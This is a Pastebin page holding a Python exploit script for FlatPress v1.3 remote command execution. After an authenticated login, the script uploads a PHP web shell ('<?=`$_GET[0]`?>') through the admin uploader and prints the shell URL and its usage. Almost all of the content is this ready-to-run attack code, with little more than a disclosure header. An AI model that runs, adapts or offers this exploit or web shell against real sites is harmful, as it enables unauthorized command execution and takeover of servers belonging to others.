API tools faq
paste
Advertisement
FlyFar

FlatPress v1.3 - Remote Command Execution

FlyFar
Apr 22nd, 2024
587
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.48 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: FlatPress v1.3 - Remote Command Execution
  2. # Discovered by: Ahmet Ümit BAYRAM
  3. # Discovered Date: 19.04.2024
  4. # Vendor Homepage: https://www.flatpress.org
  5. # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
  6. # Tested Version: 1.3 (latest)
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import time
  11. import random
  12. import string
  13.  
  14. def random_string(length=5):
  15.     """Rastgele bir string oluşturur."""
  16.     letters = string.ascii_lowercase
  17.     return ''.join(random.choice(letters) for i in range(length))
  18.  
  19. def login_and_upload(base_url, username, password):
  20.     filename = random_string() + ".php"
  21.     login_url = f"http://{base_url}/login.php"
  22.     upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"
  23.  
  24.     with requests.Session() as session:
  25.         # Exploiting
  26.         print("Exploiting...")
  27.         time.sleep(1)
  28.  
  29.         # Giriş yapma denemesi
  30.         login_data = {
  31.         'user': username,
  32.         'pass': password,
  33.         'submit': 'Login'
  34.         }
  35.         print("Logging in...")
  36.         response = session.post(login_url, data=login_data)
  37.         time.sleep(1)
  38.  
  39.         if "Logout" in response.text:
  40.             print("Login Successful!")
  41.         else:
  42.             print("Login Failed!")
  43.             print(response.text)
  44.             return
  45.  
  46.         # Dosya yükleme denemesi
  47.         print("Shell uploading...")
  48.         time.sleep(1)
  49.  
  50.         # Form verileri ve dosyalar
  51.         files = {
  52.         'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
  53.         }
  54.         form_data = {
  55.         '_wpnonce': '9e0ed04260',
  56.         '_wp_http_referer': '/admin.php?p=uploader',
  57.         'upload': 'Upload'
  58.         }
  59.  
  60.         response = session.post(upload_url, files=files, data=form_data)
  61.  
  62.         if "File(s) uploaded" in response.text or "Upload" in response.text:
  63.             shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
  64.             print(f"Your Shell is Ready: {shell_url}")
  65.             time.sleep(1)
  66.             print(f"Shell Usage: {shell_url}?0=command")
  67.         else:
  68.             print("Exploit Failed!")
  69.             print(response.status_code, response.text)
  70.  
  71. # Örnek kullanım: python script.py siteadi.com username password
  72. if __name__ == "__main__":
  73.     import sys
  74.     if len(sys.argv) != 4:
  75.         print("Usage: script.py <base_url> <username> <password>")
  76.     else:
  77.         base_url, username, password = sys.argv[1:]
  78.         login_and_upload(base_url, username, password)
  79.            
Tags: Exploit CVE Vulnerability RCE FlatPress
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!